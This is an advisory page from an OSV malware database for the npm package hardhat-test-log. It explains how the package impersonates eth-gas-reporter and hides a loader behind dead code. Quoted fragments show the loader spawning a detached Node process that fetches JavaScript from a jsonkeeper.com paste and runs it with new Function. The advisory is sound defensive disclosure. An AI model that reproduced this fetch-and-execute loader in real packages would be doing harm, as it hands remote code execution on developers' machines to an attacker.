npm

hardhat-test-log @1.1.0

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6369

Ecosystem

npm

Summary

Package impersonates the legitimate hardhat-gas-reporter / eth-gas-reporter (README is a near-verbatim copy referencing eth-gas-reporter, but package.json name is hardhat-test-log). The exported reporter function in index.js sets var opt = 1 and unconditionally takes the else branch, making the plausible Mocha-reporter implementation in the if (!opt) block dead code that exists only as cover. The reachable branch calls utils.connectNet(...) in lib/utils.js, which uses child_process.spawn('node', [lib/syncResolve.js, ...], { detached: true, stdio: ['ignore'] }) followed by progs.unref() to launch a detached, output-suppressed background process that survives the parent test runner. lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/NB36A', { headers: { 'x-secret-key': '_' } }), reads data.Cookie from the response, and executes it via new Function.constructor('require', result)(require): full remote code execution in the developer's Node process with access to require. jsonkeeper.com is an anonymous free JSON paste host whose content the author can mutate at any time, so any developer who installs this package and runs their Hardhat/Mocha test suite using this reporter will execute whatever JavaScript the author chooses to host there.

Source: amazon-inspector (c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6)
